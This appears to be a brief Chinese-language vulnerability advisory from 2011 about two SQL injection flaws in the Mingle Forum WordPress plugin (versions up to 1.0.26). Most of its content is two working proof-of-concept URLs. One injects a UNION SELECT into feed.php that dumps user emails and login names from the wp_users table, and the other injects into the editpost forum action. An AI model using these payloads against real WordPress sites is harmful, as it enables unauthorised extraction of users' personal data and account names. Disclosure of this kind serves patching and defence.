Mingle Forum (WordPress Plugin) <= 1.0.26 SQL I
时间:2011-01-09 来源:Charles
发布日期:2011-01.06
发布作者:Charles
漏洞类型:SQL注入
漏洞描述: Mingle Forum <= 1.0.26 存在两处注入漏洞。
PoC &
1、http://path.to/wordpress/wp-content/plugins/mingle-forum/feed.php?topic=0%20UNION%20SELECT%201,user_email,3,4,5,user_login,7%20FROM%20wp_users%20%23
2、http://path.to/forums/?mingleforumaction=editpost&t=1.0&id=0%20UNION%20SELECT%201,2,3,4,5,6,7%20%23
标签分类:
相关阅读 更多 +
排行榜 更多 +